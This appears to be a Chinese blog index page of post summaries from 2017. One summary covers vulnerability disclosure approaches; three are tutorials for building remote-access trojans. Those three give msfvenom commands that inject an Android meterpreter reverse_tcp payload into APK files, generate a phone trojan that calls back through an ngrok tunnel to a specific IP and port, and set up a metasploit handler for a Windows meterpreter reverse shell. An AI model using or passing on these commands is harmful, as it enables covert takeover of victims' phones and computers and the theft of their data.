2017年6月7日

漏洞挖掘者的各种漏洞披露方法

摘要: 收集了一部分 1,公开披露,完全把漏洞和渗透测试代放出来,不给厂商时间出补丁 2,跟厂商商量,并给时间厂商出补丁 3,小规模的披露,这样会逐渐让这个漏洞变得的危险起来,如ms010-17 4,把漏洞发布到漏洞平台 阅读全文

posted @ 2017-06-07 17:57 东京$ 阅读(478) 评论(0) 推荐(0)

msfvenom向apk注入payload

摘要: 首先安装apt-get install apkinjector 这个东西,msfvenom重新组装apk的时候会自动调用 msfvenom -x /路径/apk android/meterpreter/reverse_tcp LHOST=<ip> LPORT=<端口> -o /存放路径/注入成功的a 阅读全文

posted @ 2017-06-07 17:17 东京$ 阅读(1839) 评论(0) 推荐(0)

msfconsole弄外网手机木马

摘要: 创建个通道./ngrok tcp 1113 msfvenom -p android/meterpreter/reverse_tcp LHOST=52.15.62.13 LPORT=17016 R > ttxd.apk 现在我把这个apk导入到手机上然后运行 我们来运行 exploit 可以看到我们已 阅读全文

posted @ 2017-06-07 15:37 东京$ 阅读(3239) 评论(2) 推荐(2)

metasploit配置windows外网木马

摘要: 首先在命令端输入./ngrok tcp 2222然后会变成这样 我们测试一下,启动msfconsole msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpP 阅读全文

posted @ 2017-06-07 10:33 东京$ 阅读(1738) 评论(1) 推荐(1)

导航